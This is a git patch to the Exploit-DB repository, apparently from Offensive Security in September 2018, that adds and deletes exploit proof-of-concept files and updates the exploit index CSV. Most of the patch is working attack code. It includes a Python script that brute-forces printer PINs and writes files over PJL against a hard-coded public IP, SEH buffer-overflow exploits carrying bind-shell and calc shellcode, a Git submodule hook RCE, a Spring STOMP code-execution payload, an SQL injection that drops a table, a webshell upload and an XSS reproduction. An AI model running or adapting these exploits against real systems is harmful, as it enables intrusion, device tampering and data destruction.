From 32f471140af171ef21960cfd8bcac4f2f4afd877 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 6 Sep 2018 05:01:55 +0000 Subject: [PATCH] DB: 2018-09-06 18 changes to exploits/shellcodes Microsoft people 10.1807.2131.0 - Denial of service (PoC) GNU glibc < 2.27 - Local Buffer Overflow UltraISO 9.7.1.3519 - Buffer Overflow (SEH) JBoss 4.2.x/4.3.x - Information Disclosure Git < 2.17.1 - Remote Code Execution FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution FTPShell Server 6.80 - 'Add Account Name' Buffer Overflow (SEH) Monstra CMS 3.0.4 - Remote Code Execution OpenDaylight - SQL Injection Tenda ADSL Router D152 - Cross-Site Scripting Pivotal Spring Java Framework < 5.0 - Remote Code Execution --- exploits/hardware/remote/45332.py | 94 ++++++++++++++++++++++++++ exploits/hardware/webapps/45336.txt | 15 ++++ exploits/java/webapps/44747.txt | 22 ------ exploits/java/webapps/44796.txt | 28 -------- exploits/linux/local/44750.txt | 36 ---------- exploits/linux/remote/44822.txt | 54 --------------- exploits/multiple/remote/44009.c | 85 ----------------------- exploits/php/webapps/44621.txt | 23 ------- exploits/windows_x86-64/dos/45335.txt | 36 ++++++++++ exploits/windows_x86-64/local/45278.py | 52 -------------- exploits/windows_x86/remote/45333.py | 54 +++++++++++++++ files_exploits.csv | 11 ++- 12 files changed, 203 insertions(+), 307 deletions(-) create mode 100755 exploits/hardware/remote/45332.py create mode 100644 exploits/hardware/webapps/45336.txt delete mode 100644 exploits/java/webapps/44747.txt delete mode 100644 exploits/java/webapps/44796.txt delete mode 100644 exploits/linux/local/44750.txt delete mode 100644 exploits/linux/remote/44822.txt delete mode 100644 exploits/multiple/remote/44009.c delete mode 100644 exploits/php/webapps/44621.txt create mode 100644 exploits/windows_x86-64/dos/45335.txt delete mode 100755 exploits/windows_x86-64/local/45278.py create mode 100755 exploits/windows_x86/remote/45333.py diff --git a/exploits/hardware/remote/45332.py b/exploits/hardware/remote/45332.py new file mode 100755 index 000000000..e3dfa7a5a --- /dev/null +++ b/exploits/hardware/remote/45332.py @@ -0,0 +1,94 @@ +# Exploit Title: FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution +# Date: 2018-09-05 +# Exploit Author: vr_system +# Vendor Homepage: https://www.fujixerox.com.cn/ +# Software Link: https://www.fujixerox.com.cn/ +# Version: DocuCentre-IV,DocuCentre-VI,DocuCentre-V,ApeosPort-VI,ApeosPort-V +# Tested on: DocuCentre-V 3065,ApeosPort-VI C3371,ApeosPort-V C4475,ApeosPort-V C3375,DocuCentre-VI C2271,ApeosPort-V C5576,DocuCentre-IV C2263,DocuCentre-V C2263,ApeosPort-V 5070 +# CVE : N/A + +# POC:Ability to write files to the printer +#!/usr/bin/env python +# -*- coding: UTF-8 -*- +import socket +import time +PJL_START = "\033%-12345X@PJL " +PJL_FINISH = "\033%-12345X\r\n" + +def Buildsocket(ip,port=9100): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) + sock.settimeout(5) + try: + sock.connect((ip, port)) + except: + print "[!*]-ip-%s-can't connect--" % ip + return 'error' + for i in range(500): + print"bypass pin:{0}".format(i) + PJL_INFO_ID = """JOB PASSWORD={0}\r\n""".format(i) + DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH + sock.send(DEVICEID) + PJL_INFO_ID = """DEFAULT PASSWORD=0\r\n""" + DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH + sock.send(DEVICEID) + + PJL_INFO_ID = """DEFAULT CPLOCK=OFF\r\n""" + DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH + sock.send(DEVICEID) + PJL_INFO_ID = """DEFAULT DISKLOCK=OFF\r\n""" + DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH + sock.send(DEVICEID) + + PJL_INFO_ID = """FSDOWNLOAD FORMAT:BINARY SIZE=4 NAME="0:/test4"\r\n""" + DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH + sock.send(DEVICEID) + try: + device = sock.recv(1024) + except:pass + PJL_INFO_ID = """FSUPLOAD NAME="0:/test4" OFFSET=0 SIZE=4\r\n""" + DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH + sock.send(DEVICEID) + try: + device = sock.recv(1024) + except:pass + finally: + sock.close() + print "OK" + +if __name__ == '__main__': + ip = "118.42.125.192" + Buildsocket(ip, port=9100) + +# POC:Ability to view files in the printer +##!/usr/bin/env python +# -*- coding: UTF-8 -*- +import socket +PJL_START = "\033%-12345X@PJL " +PJL_FINISH = "\033%-12345X\r\n" + +def Buildsocket(ip, port=9100): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) + sock.settimeout(5) + try: + sock.connect((ip, port)) + except: + print "[!*]-ip-%s-can't connect--" % ip + return 'error' + PJL_INFO_ID = """FSDIRLIST NAME="0:/" ENTRY=1 COUNT=65535""" + DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH + sock.send(DEVICEID) + try: + device = sock.recv(1024) + except:pass + PJL_INFO_ID = """FSDIRLIST NAME="0:/" ENTRY=1""" + DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH + sock.send(DEVICEID) # + try: + device = sock.recv(1024) + except: + return 'No' + print "[!*]-ip-%s-is-ok\r\ndeviceidis-%s" % (str(ip), device) + sock.close() + return 'OK' +if __name__ == '__main__': + Buildsocket("118.42.125.192", port=9100) \ No newline at end of file diff --git a/exploits/hardware/webapps/45336.txt b/exploits/hardware/webapps/45336.txt new file mode 100644 index 000000000..f63c9e54a --- /dev/null +++ b/exploits/hardware/webapps/45336.txt @@ -0,0 +1,15 @@ +# Exploit Title: Tenda D152 ADSL Router - Cross-Site Scripting +# Exploit Author: Sandip Dey +# Date: 2018-07-21 +# Vendor Homepage: http://www.tendacn.com +# Hardware Link: https://www.amazon.in/Tenda-D152-ADSL2-Modem-Router/dp/B00IM8CWTE/ref=sr_1_fkmr0_1?ie=UTF8&qid=1536170904&sr=8-1-fkmr0&keywords=Tenda+D152+ADSL+router +# Category: Hardware +# Tested on: Windows 8.1 +# CVE: CVE-2018-14497 + +# Reproduction Steps: + +Goto your Wifi Router Gateway [i.e: http://Target] +Go to --> "General Setup" --> "Wireless" --> "Basic Settings +Now change the SSID to and hit apply +Refresh the page, and you will get the "Sandip" pop-up \ No newline at end of file diff --git a/exploits/java/webapps/44747.txt b/exploits/java/webapps/44747.txt deleted file mode 100644 index 82e96751d..000000000 --- a/exploits/java/webapps/44747.txt +++ /dev/null @@ -1,22 +0,0 @@ -# Exploit Title: OpenDaylight SQL Injection -# Date: 2018-05-24 -# Exploit Author: JameelNabbo -# Website: jameelnabbo.com -# Vendor Homepage: https://www.opendaylight.org -# CVE: CVE-2018-1132 - - -intro: -OpenDaylight (ODL) is a modular open platform for customizing and automating networks of any size and scale. The OpenDaylight Project arose out of the SDN movement, with a clear focus on network programmability. It was designed from the outset as a foundation for commercial solutions that address a variety of use cases in existing network environments. - -attackers can SQL inject the component's database(SQLite) without authenticating to the controller or SDNInterfaceapp. - -The bug is in /impl/src/main/java/org/opendaylight/sdninterfaceapp/impl/database/SdniDataBase.java (line 373~391) - -The SDNI concats port information to build an insert SQL query, and it executes the query in SQLite. -However, in line 386, the portName is a string that can be customized by switches. Since SQLite supports multiple sql queries in one run, -attackers can customize the port name to inject another SQL if they compromise or forge a switch. - -POC: -For example, he can set portName as: -");drop table NAME;// \ No newline at end of file diff --git a/exploits/java/webapps/44796.txt b/exploits/java/webapps/44796.txt deleted file mode 100644 index 430f83ade..000000000 --- a/exploits/java/webapps/44796.txt +++ /dev/null @@ -1,28 +0,0 @@ -# Exploit Title: Pivotal Spring Java Framework < 5.0 - Remote Code Execution -# Date: 2018-05-28 -# Exploit Author: JameelNabbo -# Website: jameelnabbo.com -# Vendor Homepage: -# https://pivotal.io/agile/press-release/pivotal-releases-spring-framework-for-modern-java-application-development -# CVE: CVE: CVE-2018-1270 -# Version: <= 5.0.x - -# Description: By connecting to spring STOMP, and putting the key for "selector" -# header, we can execute code on Spring. - -# POC: -# Here' we are writting java commands to be executed within the selector header -# Connecting to a web socket using SockJS -# Ref: https://docs.spring.io/spring/docs/current/spring-framework-reference/web.html#websocket-stomp-enable - -var header = {"selector":"T(java,lang.Runtime).getRuntime().exec('open -a Calculator"}; - -var socket = new SockJS('/gs-guide-websocket'); -var stompClient = webstomp.over(socket); -stompClient.connect({}, function (frame){ - setConnected(true); - console.log('Connected: ' + frame); - stompClient.subscribe('/topic/greetings', function(greeting){ - showGreeting(JSON.parse(greeting.body).content); - },header); -}); \ No newline at end of file diff --git a/exploits/linux/local/44750.txt b/exploits/linux/local/44750.txt deleted file mode 100644 index 4e90ed59a..000000000 --- a/exploits/linux/local/44750.txt +++ /dev/null @@ -1,36 +0,0 @@ -# Exploit Title: GNU glibc < 2.27 - Local Buffer Overflow -# Date: 2018-05-24 -# Exploit Author: JameelNabbo -# Website: jameelnabbo.com -# Vendor Homepage: http://www.gnu.org/ -# CVE: CVE-2018-11237 - - -# POC: - -$ cat mempcpy.c -#define _GNU_SOURCE 1 -#include -#include - -#define N 97699 -char a[N]; -char b[N+128]; - -int -main (void) -{ - memset (a, 'x', N); - char *c = mempcpy (b, a, N); - assert (*c == 0); -} -$ gcc -g mempcpy.c -o mempcpy -fno-builtin-mempcpy -$ ./mempcpy -mempcpy: mempcpy.c:14: main: Assertion `*c == 0' failed. - -The problem is these two lines in memmove-avx512-no-vzeroupper.S: - - vmovups %zmm4, (%rax) - vmovups %zmm5, 0x40(%rax) - -For mempcpy, %rax points to the end of the buffer. \ No newline at end of file diff --git a/exploits/linux/remote/44822.txt b/exploits/linux/remote/44822.txt deleted file mode 100644 index f1494a4ab..000000000 --- a/exploits/linux/remote/44822.txt +++ /dev/null @@ -1,54 +0,0 @@ -# Exploit Title: Git (code execution) -# Date: 2018-05-29 -# Exploit Author: JameelNabbo -# Website: jameelnabbo.com -# Vendor Homepage: https://github.com/git/git -# CVE: CVE-2018-11235 - #Version: <=2.17.1 -# Tested on Kali Linux - - -P0C: - -Create two files: -pwned.sh: the file which will contain our commands to be executed -commit.sh the fole which contain a normal build with a bit of calls to our pwned.sh file - -add the follwing to Pwned.sh: -#!/bin/sh -cat << EOF - -#here we can put our lovely commands -Exploited! : $(ifconfig) - -EOF - -#-------- - -Add the follwing to commit.sh file: -#!/bin/sh - -set -e - -repo_dir="$PWD/repo" -#change it to any other Repo -repo_submodule='https://github.com/JameelNabbo/SmartWorm' - -git init "$repo_dir" -cd "$repo_dir" -git submodule add "$repo_submodule" pwned -mkdir modules -cp -r .git/modules/pwned modules -cp ../pwned.sh modules/pwned/hooks/post-checkout -git config -f .gitmodules submodule.pwned.update checkout -git config -f .gitmodules --rename-section submodule.pwned submodule.../../modules/pwned -git add modules -git submodule add "$repo_submodule" -git add SmartWorm -git commit -am pwned -echo "All done, now \`git clone --recurse-submodules \"$repo_dir\" dest_dir\`” - - -—————— -Solution: -https://www.edwardthomson.com/blog/upgrading_git_for_cve2018_11235.html \ No newline at end of file diff --git a/exploits/multiple/remote/44009.c b/exploits/multiple/remote/44009.c deleted file mode 100644 index 95f1affb4..000000000 --- a/exploits/multiple/remote/44009.c +++ /dev/null @@ -1,85 +0,0 @@ -# Exploit Title: JBoss sensitive information disclosure 4.2X & 4.3.X -# Date: 02/08/2018 -# Exploit Author: JameelNabbo -# Vendor Homepage: http://www.jboss.org -# Software Link: http://jbossas.jboss.org/downloads -# Version: 4.2X. & 4.3.X -# Tested on: Linux Ubuntu -# CVE : CVE-2010-1429 - - - - -1. Description - -By requesting the Status param and sitting its value to true, Jobss will print a sensitive information such as Memory used/Total Memory / Client IP address. -Example: http://127.0.01/status?full=true - - -2. Proof of Concept - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -int socket_connect(char *host, in_port_t port){ - struct hostent *hp; - struct sockaddr_in addr; - int on = 1, sock; - - if((hp = gethostbyname(host)) == NULL){ - herror("gethostbyname"); - exit(1); - } - bcopy(hp->h_addr, &addr.sin_addr, hp->h_length); - addr.sin_port = htons(port); - addr.sin_family = AF_INET; - sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); - setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int)); - - if(sock == -1){ - perror("setsockopt"); - exit(1); - } - - if(connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1){ - perror("connect"); - exit(1); - - } - return sock; -} - -#define BUFFER_SIZE 1024 - -int main(int argc, char *argv[]){ - int fd; - char buffer[BUFFER_SIZE]; - - if(argc < 3){ - fprintf(stderr, "Usage: %s \n", argv[0]); - exit(1); - } - - fd = socket_connect(argv[1], atoi(argv[2])); - write(fd, "GET /status?full=true\r\n", strlen("GET /status?full=true\r\n")); // write(fd, char[]*, len); - while(read(fd, buffer, BUFFER_SIZE - 1) != 0){ - fprintf(stderr, "%s", buffer); - } - - shutdown(fd, SHUT_RDWR); - close(fd); - return 0; -} - - -3. Solution : -Update to version 4.2.3 or later \ No newline at end of file diff --git a/exploits/php/webapps/44621.txt b/exploits/php/webapps/44621.txt deleted file mode 100644 index 4cc0aa20e..000000000 --- a/exploits/php/webapps/44621.txt +++ /dev/null @@ -1,23 +0,0 @@ -# Exploit Title: Monstra CMS 3.0.4 Upload Plugin Remote code execution CVE-2018-9037 -# Date: 2018-05-14 -# Exploit Author: Jameel Nabbo -# Vendor Homepage: https://github.com/monstra-cms/monstra -# Software Link: https://github.com/monstra-cms/monstra -# Version: 3.0.4 -# Tested on: MAC OSX -# CVE :CVE-2018-9037 - - -Monstra CMS 3.0.4 allows remote code execution via an upload_file request for a .zip file, -which is automatically extracted and may contain .php files. - - -Steps to Reproduce -1: Log in as a user with page editing permissions -2: Upload a plugin archive containing php webshell code -3: After successful upload we can execute the command. - -Then go to: http://127.0.0.1/plugins/{Name_Of_Zip_File_You_Uploaded}/{File_In_Zip}.php - -Solution -Filter plugin content during plugin upload \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45335.txt b/exploits/windows_x86-64/dos/45335.txt new file mode 100644 index 000000000..03df664ac --- /dev/null +++ b/exploits/windows_x86-64/dos/45335.txt @@ -0,0 +1,36 @@ +# Exploit Title: Microsoft people 10.1807.2131.0 - Denial of service (PoC) +# Exploit Author : L0RD +# Contact: borna.nematzadeh123@gmail.com +# Date: 2018-09-04 +# Vendor Homepage : https://www.microsoft.com +# Software link: https://www.microsoft.com/en-us/p/microsoft-people/9nblggh10pg8?activetab=pivot:overviewtab +# Version: <= 10.1807.2131.0 +# Tested on: Windows 10 +# CVE: N/A + +# Description: +# Microsoft people desktop application is a contact management app and +# address book included in Microsoft's Windows 8 and 10. +# It allows a user to organize and link contacts from different email +# accounts with a unique graphical interface +# More information : +# https://support.microsoft.com/en-us/help/14103/windows-people-app-help + +# Steps to reproduce: +# 1) Run the python exploit code and copy content of file. +# 2) Open people application +# 3) Click on "new contact (+)" and paste content of "poc.txt" into name filed and save contact +# 4) Crash! + +#!/usr/bin/python + +buffer = "\x41" * 20000 +payload = buffer +try: + f=open("poc.txt","w") + print "[+] Creating %s bytes payload..." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86-64/local/45278.py b/exploits/windows_x86-64/local/45278.py deleted file mode 100755 index 43a3e8818..000000000 --- a/exploits/windows_x86-64/local/45278.py +++ /dev/null @@ -1,52 +0,0 @@ -# Exploit Title: UltraISO 9.7.1.3519 - Buffer Overflow (SEH) -# Date: 2018-08-23 -# Author: Shubham Singh -# Known As: Spirited Wolf [Twitter: @Pwsecspirit] -# Vendor Homepage: https://www.ultraiso.com -# Software Link Download : https://www.ultraiso.com/download.html -# Tested on: Windows 7 Ultimate - 64-bit -# Steps to Reproduce: -# 1. Run the python exploit script, it will create a new -# 2. File with the name "exploit.txt" just copy the text inside "exploit.txt" -# 3. start the UltraISO program. -# 4. In the new window click "Tools" > "Mount To Virtual Drive" . -# 5. Now Paste the content of "exploit.txt" into the field: " Image File ". -# 6. Click "Mount" and you will see a lot of calculators. -# Thanks: corelanc0d3r and PeaceMaker - -#!/usr/bin/env python - -#Badchars \x00\x0a\x0d -shellcode = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" -shellcode += "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" -shellcode += "\x77\x20\x8b\x3f\x80\x7e\x0c\x33" -shellcode += "\x75\xf2\x89\xc7\x03\x78\x3c\x8b" -shellcode += "\x57\x78\x01\xc2\x8b\x7a\x20\x01" -shellcode += "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" -shellcode += "\x45\x81\x3e\x43\x72\x65\x61\x75" -shellcode += "\xf2\x81\x7e\x08\x6f\x63\x65\x73" -shellcode += "\x75\xe9\x8b\x7a\x24\x01\xc7\x66" -shellcode += "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" -shellcode += "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" -shellcode += "\xb1\xff\x53\xe2\xfd\x68\x63\x61" -shellcode += "\x6c\x63\x89\xe2\x52\x52\x53\x53" -shellcode += "\x53\x53\x53\x53\x52\x53\xff\xd7" -#Exit intermodular call -shellcode += "\xB8\x8A\x70\xA0\xFF\xF7\xD8\x50\xC3" -fill = "\x42" * (126 - len(shellcode)) -junk = "A" * (1064 - len(shellcode) - len(fill)) -#0x005540e9 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [UltraISO.exe] -#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v9.7.1.3519 (C:\Program Files (x86)\UltraISO\UltraISO.exe) -sjmp = "\xeb\x80\xCC\xCC" -seh = "\xe9\x40\x55" - - -spirit = junk + shellcode + fill + sjmp + seh -try: - f=open("exploit.txt","w") - print "[+] Creating %s bytes evil payload.." %len(spirit) - f.write(spirit) - f.close() - print "[+] File created!" -except: - print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86/remote/45333.py b/exploits/windows_x86/remote/45333.py new file mode 100755 index 000000000..e9a588484 --- /dev/null +++ b/exploits/windows_x86/remote/45333.py @@ -0,0 +1,54 @@ +# Exploit Title: FTPShell Server 6.80 - 'Add Account Name' Buffer Overflow (SEH) +# Discovery by: Luis Martinez +# Discovery Date: 2018-09-04 +# Vendor Homepage: http://www.ftpshell.com/ +# Software Link: http://www.ftpshell.com/downloadserver.htm +# Tested Version: 6.80 +# Vulnerability Type: Buffer Overflow (SEH) Local +# Tested on OS: Windows XP Professional SP3 x86 es + +# Steps to Produce the Buffer Overflow (SEH): +# 1.- Run python code : FTPShell_Server_6.80.py +# 2.- Open FTPShell_Server_6.80.txt and copy content to clipboard +# 3.- Open FTPShell Server Administrator +# 4.- Manage FTP Accounts... +# 5.- Add Account Name +# 6.- Paste ClipBoard on "Account name to ban" +# 7.- OK + +#!/usr/bin/env python + +#msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c +shellcode = ( +"\xbb\x3c\xd8\x80\xcc\xda\xc3\xd9\x74\x24\xf4\x5a\x31\xc9\xb1" +"\x53\x31\x5a\x12\x03\x5a\x12\x83\xd6\x24\x62\x39\xda\x3d\xe1" +"\xc2\x22\xbe\x86\x4b\xc7\x8f\x86\x28\x8c\xa0\x36\x3a\xc0\x4c" +"\xbc\x6e\xf0\xc7\xb0\xa6\xf7\x60\x7e\x91\x36\x70\xd3\xe1\x59" +"\xf2\x2e\x36\xb9\xcb\xe0\x4b\xb8\x0c\x1c\xa1\xe8\xc5\x6a\x14" +"\x1c\x61\x26\xa5\x97\x39\xa6\xad\x44\x89\xc9\x9c\xdb\x81\x93" +"\x3e\xda\x46\xa8\x76\xc4\x8b\x95\xc1\x7f\x7f\x61\xd0\xa9\xb1" +"\x8a\x7f\x94\x7d\x79\x81\xd1\xba\x62\xf4\x2b\xb9\x1f\x0f\xe8" +"\xc3\xfb\x9a\xea\x64\x8f\x3d\xd6\x95\x5c\xdb\x9d\x9a\x29\xaf" +"\xf9\xbe\xac\x7c\x72\xba\x25\x83\x54\x4a\x7d\xa0\x70\x16\x25" +"\xc9\x21\xf2\x88\xf6\x31\x5d\x74\x53\x3a\x70\x61\xee\x61\x1d" +"\x46\xc3\x99\xdd\xc0\x54\xea\xef\x4f\xcf\x64\x5c\x07\xc9\x73" +"\xa3\x32\xad\xeb\x5a\xbd\xce\x22\x99\xe9\x9e\x5c\x08\x92\x74" +"\x9c\xb5\x47\xe0\x94\x10\x38\x17\x59\xe2\xe8\x97\xf1\x8b\xe2" +"\x17\x2e\xab\x0c\xf2\x47\x44\xf1\xfd\x76\xc9\x7c\x1b\x12\xe1" +"\x28\xb3\x8a\xc3\x0e\x0c\x2d\x3b\x65\x24\xd9\x74\x6f\xf3\xe6" +"\x84\xa5\x53\x70\x0f\xaa\x67\x61\x10\xe7\xcf\xf6\x87\x7d\x9e" +"\xb5\x36\x81\x8b\x2d\xda\x10\x50\xad\x95\x08\xcf\xfa\xf2\xff" +"\x06\x6e\xef\xa6\xb0\x8c\xf2\x3f\xfa\x14\x29\xfc\x05\x95\xbc" +"\xb8\x21\x85\x78\x40\x6e\xf1\xd4\x17\x38\xaf\x92\xc1\x8a\x19" +"\x4d\xbd\x44\xcd\x08\x8d\x56\x8b\x14\xd8\x20\x73\xa4\xb5\x74" +"\x8c\x09\x52\x71\xf5\x77\xc2\x7e\x2c\x3c\xf2\x34\x6c\x15\x9b" +"\x90\xe5\x27\xc6\x22\xd0\x64\xff\xa0\xd0\x14\x04\xb8\x91\x11" +"\x40\x7e\x4a\x68\xd9\xeb\x6c\xdf\xda\x39") + +nSEH = "\xEB\x06\x90\x90" +SEH = "\x47\x05\xFC\x7F" #7FFC0547 POP EDI + +buffer = "\x41" * 1268 + nSEH + SEH + shellcode +f = open ("FTPShell_Server_6.80.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 0f5ae65df..8d22fe506 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5256,6 +5256,7 @@ id,file,description,date,author,type,platform,port 43720,exploits/windows/dos/43720.js,"Microsoft Edge Chakra - 'AsmJSByteCodeGenerator::EmitCall' Out-of-Bounds Read",2018-01-17,"Google Security Research",dos,windows, 43723,exploits/windows/dos/43723.js,"Microsoft Edge Chakra JIT - Stack-to-Heap Copy",2018-01-17,"Google Security Research",dos,windows, 43776,exploits/hardware/dos/43776.py,"Smiths Medical Medfusion 4000 - 'DHCP' Denial of Service",2018-01-18,"Scott Gayou",dos,hardware, +45335,exploits/windows_x86-64/dos/45335.txt,"Microsoft people 10.1807.2131.0 - Denial of service (PoC)",2018-09-05,L0RD,dos,windows_x86-64, 43780,exploits/macos/dos/43780.c,"macOS 10.13 (17A365) - Kernel Memory Disclosure due to Lack of Bounds Checking in 'AppleIntelCapriController::getDisplayPipeCapability'",2018-01-19,"Google Security Research",dos,macos, 43826,exploits/windows/dos/43826.txt,"Peercast < 0.1211 - Format String",2015-05-28,"GulfTech Security",dos,windows, 43854,exploits/windows/dos/43854.py,"MixPad 5.00 - Buffer Overflow",2018-01-23,bzyo,dos,windows, @@ -9855,7 +9856,6 @@ id,file,description,date,author,type,platform,port 44743,exploits/windows/local/44743.html,"Microsoft Internet Explorer 11 - javascript Code Execution",2016-02-01,checkpoint,local,windows, 44744,exploits/windows/local/44744.txt,"Flash ActiveX 28.0.0.137 - Code Execution (1)",2016-02-16,smgorelik,local,windows, 44745,exploits/windows/local/44745.txt,"Flash ActiveX 28.0.0.137 - Code Execution (2)",2016-02-13,smgorelik,local,windows, -44750,exploits/linux/local/44750.txt,"GNU glibc < 2.27 - Local Buffer Overflow",2018-05-24,JameelNabbo,local,linux, 44776,exploits/android/local/44776.txt,"Werewolf Online 0.8.8 - Information Disclosure",2018-05-27,ManhNho,local,android, 44787,exploits/windows_x86/local/44787.py,"ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)",2018-05-28,"Gokul Babu",local,windows_x86, 44797,exploits/linux/local/44797.txt,"GNU Barcode 0.99 - Buffer Overflow",2018-05-29,LiquidWorm,local,linux, @@ -9930,7 +9930,6 @@ id,file,description,date,author,type,platform,port 45250,exploits/windows_x86/local/45250.py,"StyleWriter 4 1.0 - Denial of Service (PoC)",2018-08-23,"Gionathan Reale",local,windows_x86, 45259,exploits/windows_x86/local/45259.py,"CuteFTP 5.0 - Buffer Overflow",2018-08-27,"Matteo Malvica",local,windows_x86, 45269,exploits/windows/local/45269.rb,"Foxit PDF Reader 9.0.1.1049 - Pointer Overwrite Use-After-Free (Metasploit)",2018-08-27,Metasploit,local,windows, -45278,exploits/windows_x86-64/local/45278.py,"UltraISO 9.7.1.3519 - Buffer Overflow (SEH)",2018-08-28,"Shubham Singh",local,windows_x86-64, 45280,exploits/windows/local/45280.txt,"Microsoft Windows - Advanced Local Procedure Call (ALPC) Local Privilege Escalation",2018-08-28,SandboxEscaper,local,windows, 45288,exploits/linux/local/45288.py,"SIPP 3.3 - Stack-Based Buffer Overflow",2018-08-29,"Juan Sacco",local,linux, 45289,exploits/windows/local/45289.py,"R 3.4.4 - Buffer Overflow (SEH)",2018-08-29,ZwX,local,windows, @@ -16451,7 +16450,6 @@ id,file,description,date,author,type,platform,port 44002,exploits/multiple/remote/44002.py,"Dahua Generation 2/3 - Backdoor Access",2017-05-02,bashis,remote,multiple, 44004,exploits/hardware/remote/44004.py,"HiSilicon DVR Devices - Remote Code Execution",2017-09-07,"Istvan Toth",remote,hardware, 44005,exploits/multiple/remote/44005.py,"HPE iLO 4 < 2.53 - Add New Administrator User",2018-02-05,skelsec,remote,multiple, -44009,exploits/multiple/remote/44009.c,"JBoss 4.2.x/4.3.x - Information Disclosure",2018-02-10,JameelNabbo,remote,multiple, 44022,exploits/linux/remote/44022.md,"LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure",2018-02-10,"Mikhail Klementev",remote,linux, 44027,exploits/windows/remote/44027.py,"CloudMe Sync < 1.11.0 - Buffer Overflow",2018-02-13,hyp3rlinx,remote,windows, 44031,exploits/windows/remote/44031.html,"Advantech WebAccess 8.3.0 - Remote Code Execution",2018-02-13,"Nassim Asrir",remote,windows, @@ -16720,7 +16718,6 @@ id,file,description,date,author,type,platform,port 44760,exploits/hardware/remote/44760.rb,"D-Link DSL-2750B - OS Command Injection (Metasploit)",2018-05-25,Metasploit,remote,hardware, 44779,exploits/hardware/remote/44779.txt,"Bitmain Antminer D3/L3+/S9 - Remote Command Execution",2018-05-27,CorryL,remote,hardware, 44784,exploits/windows_x86-64/remote/44784.py,"CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)",2018-05-28,"Juan Prescotto",remote,windows_x86-64, -44822,exploits/linux/remote/44822.txt,"Git < 2.17.1 - Remote Code Execution",2018-06-01,JameelNabbo,remote,linux, 44829,exploits/linux/remote/44829.py,"CyberArk < 10 - Memory Disclosure",2018-06-04,"Thomas Zuk",remote,linux, 44836,exploits/ios/remote/44836.rb,"WebKit - not_number defineProperties UAF (Metasploit)",2018-06-05,Metasploit,remote,ios, 44950,exploits/unix/remote/44950.rb,"Quest KACE Systems Management - Command Injection (Metasploit)",2018-06-27,Metasploit,remote,unix, @@ -16749,6 +16746,7 @@ id,file,description,date,author,type,platform,port 45099,exploits/php/remote/45099.rb,"WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)",2018-07-27,Metasploit,remote,php,80 45100,exploits/linux/remote/45100.rb,"Axis Network Camera - .srv to parhand RCE (Metasploit)",2018-07-27,Metasploit,remote,linux,80 45124,exploits/linux/remote/45124.rb,"SonicWall Global Management System - XMLRPC set_time_zone Command Injection (Metasploit)",2018-08-01,Metasploit,remote,linux,80 +45332,exploits/hardware/remote/45332.py,"FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution",2018-09-05,vr_system,remote,hardware, 45180,exploits/windows/remote/45180.txt,"Microsoft DirectX SDK - 'Xact.exe' Remote Code Execution",2018-08-13,hyp3rlinx,remote,windows, 45170,exploits/windows/remote/45170.py,"Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit)",2018-08-09,"Omid Shojaei",remote,windows, 45193,exploits/windows/remote/45193.rb,"Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)",2018-08-13,Metasploit,remote,windows,7001 @@ -16763,6 +16761,7 @@ id,file,description,date,author,type,platform,port 45265,exploits/linux/remote/45265.js,"Node.JS - 'node-serialize' Remote Code Execution",2017-02-08,OpSecX,remote,linux, 45272,exploits/multiple/remote/45272.txt,"Electron WebPreferences - Remote Code Execution",2018-08-27,"Matt Austin",remote,multiple, 45273,exploits/unix/remote/45273.rb,"HP Jetdirect - Path Traversal Arbitrary Code Execution (Metasploit)",2018-08-27,Metasploit,remote,unix, +45333,exploits/windows_x86/remote/45333.py,"FTPShell Server 6.80 - 'Add Account Name' Buffer Overflow (SEH)",2018-09-05,"Luis Martínez",remote,windows_x86, 45283,exploits/hardware/remote/45283.rb,"Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure",2018-08-29,BrianWGray,remote,hardware, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, @@ -39583,7 +39582,6 @@ id,file,description,date,author,type,platform,port 44613,exploits/windows/webapps/44613.txt,"Open-AudIT Community 2.2.0 - Cross-Site Scripting",2018-05-11,"Tejesh Kolisetty",webapps,windows, 44617,exploits/php/webapps/44617.txt,"WUZHI 